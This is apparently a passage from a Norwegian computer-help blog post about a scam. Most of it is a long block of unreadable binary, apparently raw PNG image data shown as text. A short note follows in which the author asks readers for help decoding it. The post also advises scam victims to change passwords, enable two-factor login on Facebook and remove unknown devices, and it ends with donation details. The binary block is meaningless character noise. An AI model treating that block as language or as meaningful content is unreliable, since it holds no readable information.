iQaÚʄ.1@7`>Kʉw7i8]2`;,Xa[:dy:-o֯CWpy ]O”/mC\BKRETK_i6~LhÈTrVA:$qґʈ^DѼ֚ahw[
^3sQRXA`rRkи-w@ 2z D]
zi)@
F!3j7ld(z=[k^F<Ha’2޿`Q9[xo .2`siQ’
KM%Xq?5\FBKvp{h`hX64uV0g-
TJ6^RfyELmƽehLF{Hc[#:7<G96(JN!:k3@atRM]<꜡
5=NG%Ycm4-A’spj fhTvl !
NLu=\Mq)Xhw”hT=Rw+j=Ŝld!**X%+&
,
c,m ZzE\<rӑи@(%@%7:
w `I-O)[!h\Df*%SVlۚš;”q] tK1o0V:t4h\/uIeIG6”2e|hŠ gBLp*.4[=\hAdah(&n lmn1y&, V 2>
og80taA
jl4pNN9t;”4(4{:IG­9!t= )S,tev7 Z$1Dĉ:};x,4NŊ=<2@=nI?ex}nֹt
}np75q  &PCmqx[Ԡzd]2c?\֜”Y 4N[.j(O%_Au:Az,
`啎p\6?KHOA)\}!un]cŇp&4sm^J^]uỏфbC8 g&f~-Ezz#k`޹J72Yt:f@7@[`.n$Uu0Iֹ54^qc5
24֘
*mw$9S@[8i%FSiM/e;6Y”d̼ t`k}g0CV~fh”z9ٚ,;/ۥ@TG<dM
.#KYSߙʶ3nuݮ B¬>4pCiRe!#tI@[4 Mto~g-j(ƴ3iٯxȩއ`7’t{ᾡp U{+G01Y.|>%3
k9|b`f|Hze.y⇨Ґ.’AfKtM\쓥 ;e]dqC&GiɜkG^xF1iЅBH3m-Xی8rc:3T”e֖%ta yi|۷IG迃;di’jKVD?@e?Ğ\iSM{4+4MCY>9~58D fο^ciab{\f2w
Z;y+ռD>8dA^ޔU^2gf-[4IĮ潽< Kf c˄=|LjcNk^2lhFtD\]s’G;>jKct3δ-e̡fd|md }2ffݽ>񑯿,9a[Ն\{Z,f-;ڑfްeg7fܚC͌5!XҌ*j’] v¼4k_5’iW2c{//d|}Je_QFмȦJ`lO54獳N½W68x
`k;9v
lEJJЋc)?9}u=zi, Oe,4*: 3cKh@
f|}%<U
%Xc˅>P_difؖ-sɯJ7L:CB*v=d{e|1g$iL[ulU cK u)詊d(X&%Z Q-=9!Ink-U}SfZKȽSlzi
;)S=3c-[6t>l3PA^*z)p%Z;OхRЪлof.g~A-ioT<[XݗIá~FQ
GUԽ~ے٧[ukk߇=}CV
I>ܙIENDB`

 

Der er innholdet gresk, men jeg ser at det har en en png bildefil å gjøre. Hvis scammerne har noe så skjule så vil jeg få det gram i lyset. Klarer du å få noe mere ut av denne koden så bare gi meg tips og jeg oppdaterer artikkelen. Verktøyene jeg har brukt for å dekode er:

https://www.url-encode-decode.com/

https://www.base64decode.org/

 

Jeg ønsker at mine funn fører til mere kunnskap og igjen så ser du hva dårlig sikkerhet kan føre til. Sikrer du ikke nettsiden din så kan den lett brukes i svindel. Uansett hvor stor den er på internet.  Så har du blitt lurt?

  • Bytt passord
  • Sett på 2 trinns sikring på kontoen din på Facebook
  • Slett alle nye påkoblede enheter

Datahjelperne.no drives på fritiden. Nettsiden vil alltid være åpen for alle. Likte du artikkelen så kan du bidra.

Vipps: 98100
Konto: 3000.33.91236